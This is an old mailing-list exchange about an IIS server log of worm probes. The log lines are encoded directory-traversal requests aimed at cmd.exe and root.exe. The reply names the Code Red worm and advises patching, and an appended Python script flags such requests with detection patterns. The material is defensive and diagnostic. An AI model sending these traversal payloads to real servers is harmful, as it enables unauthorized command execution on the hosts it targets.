I would say Code Red worm because of all the attempts to get to cmd.exe. Best practices entail applying patches and keeping the web root off the system partition. You can find a ton of info on this on SF's Focus-MS section and on MS's website at security.
Cheers,
Leon

-----Original Message-----
From: Ryan Ratkiewicz [mailto:[EMAIL PROTECTED]]
Sent: Thursday, November 15, 2001 1:18 PM
To: [EMAIL PROTECTED]
Subject: IIS Hack Attempt

Can someone help me decipher this?

11:30:48 207.217.205.149 GET /scripts/root.exe 404
11:30:48 207.217.205.149 GET /MSADC/root.exe 404
11:30:49 207.217.205.149 GET /c/winnt/system32/cmd.exe 404
11:30:49 207.217.205.149 GET /d/winnt/system32/cmd.exe 404
11:30:49 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
11:30:49 207.217.205.149 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
11:30:50 207.217.205.149 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
11:30:50 207.217.205.149 GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe 500
11:30:50 207.217.205.149 GET /scripts/..�../winnt/system32/cmd.exe 500
11:30:50 207.217.205.149 GET /scripts/winnt/system32/cmd.exe 404
11:30:51 207.217.205.149 GET /winnt/system32/cmd.exe 404
11:30:51 207.217.205.149 GET /winnt/system32/cmd.exe 404
11:30:51 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
11:30:51 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
11:30:52 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
11:30:52 207.217.205.149 GET /scripts/..%2f../winnt/system32/cmd.exe 500

Thanks.
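As an added example (not part of either message), a small Python triage script for logs in the five-field layout shown in the post: it tags requests for cmd.exe or root.exe, directory traversal and encoded path separators, then groups them per client IP. The function names, the threshold of 3 and the final benign log line are assumptions made for the illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# First five lines are copied from the post; the last one is a constructed benign request.
SAMPLE_LOG = """\
11:30:48 207.217.205.149 GET /scripts/root.exe 404
11:30:49 207.217.205.149 GET /c/winnt/system32/cmd.exe 404
11:30:49 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
11:30:49 207.217.205.149 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
11:30:52 207.217.205.149 GET /scripts/..%2f../winnt/system32/cmd.exe 500
11:31:05 192.0.2.10 GET /default.htm 200
"""

SHELL_BINARY = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)
ENCODED_SEP = re.compile(r"%(5c|2f)", re.IGNORECASE)

def classify(uri):
    """Return the set of suspicious traits found in one request URI."""
    tags = set()
    if ENCODED_SEP.search(uri):
        tags.add("encoded-separator")
    decoded = uri
    for _ in range(3):  # decode repeatedly so nested encodings are normalised too
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    path = decoded.split("?", 1)[0].replace("\\", "/")
    if ".." in path.split("/"):
        tags.add("traversal")
    if SHELL_BINARY.search(path):
        tags.add("shell-binary")
    return tags

def scan(log_text, threshold=3):
    """Group suspicious requests by client IP; report IPs at or above threshold."""
    per_ip = defaultdict(lambda: {"hits": 0, "tags": set(), "statuses": Counter()})
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # not a time/ip/method/uri/status record
        _time, ip, _method, uri, status = fields
        tags = classify(uri)
        if tags:
            entry = per_ip[ip]
            entry["hits"] += 1
            entry["tags"] |= tags
            entry["statuses"][status] += 1
    return {ip: e for ip, e in per_ip.items() if e["hits"] >= threshold}
```

The per-IP status counts separate the requests the server answered with 404 from those that got another response code, which are the ones to look at first.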
